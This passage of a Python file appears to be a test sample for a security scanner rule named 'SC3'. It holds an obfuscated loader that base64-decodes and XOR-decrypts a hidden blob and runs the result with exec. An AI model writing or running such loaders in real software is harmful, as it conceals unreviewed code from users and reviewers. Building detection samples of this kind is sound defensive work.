3GFRA20qIqvAdV9AZHgs6p0zUUs4dj3jzg4jLBJ4bqvOKAQCaCoh6IsoAk5INz7ugHMSDXx0bviGPh0MJQw8/otye2pxPm7UsTUQDX0HEavTZlFCRwcj6oc1Lj86YkSrzntRDXkxIKPHUQ=="
_K = bytes.fromhex("4e8bee5b71601858")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    raw = base64.b64decode(_BLOB)
    return _xor(raw, _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
